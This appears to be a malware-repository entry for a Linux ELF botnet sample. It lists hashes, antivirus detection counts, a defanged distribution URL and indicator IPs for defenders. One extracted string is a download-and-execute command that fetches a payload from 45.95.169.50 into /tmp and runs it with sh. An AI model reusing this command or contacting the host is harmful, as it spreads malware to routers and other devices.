bot

First submission 2022-08-04 22:45:02

File details

File type: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=b59147d0ff458a22bc94c3aa42b6f13af6ba0b9c, not stripped
File size: 117.3 KB (120120 bytes)
MD5: 06e366090a21f5bb8fb03d956d290bac
SHA1: b535795c4a2d586fb561e4c46212a6030a4609d7
SHA256: 765f54e7cc46421838528a076800579edc954517c3602e9c98c40ea7b2e25f8e
Virus Total: 41/63
VT report date: 2022-08-02 10:40:58

File features detected

Is DLL

Packers

Anti Debug

Anti VM

Signed

XOR

URLs, FQDN and IP indicators 1

URL Host (FQDN/IP) Date Added
hXXp://nsa-tengshe-anqusec-hacker-google-baidu-apt-c-61.com/bot nsa-tengshe-anqusec-hacker-google-baidu-apt-c-61.com 2022-08-04 22:45:02

Strings analysis - Possible IPs found 2

45.95.169.50
127.0.0.1

Strings analysis - Possible URLs found 3

http://schemas.xmlsoap.org/soap/encoding/
http://45.95.169.50/bin+-O+/tmp/gpon443;sh+/tmp/gpon443
http://schemas.xmlsoap.org/soap/envelope/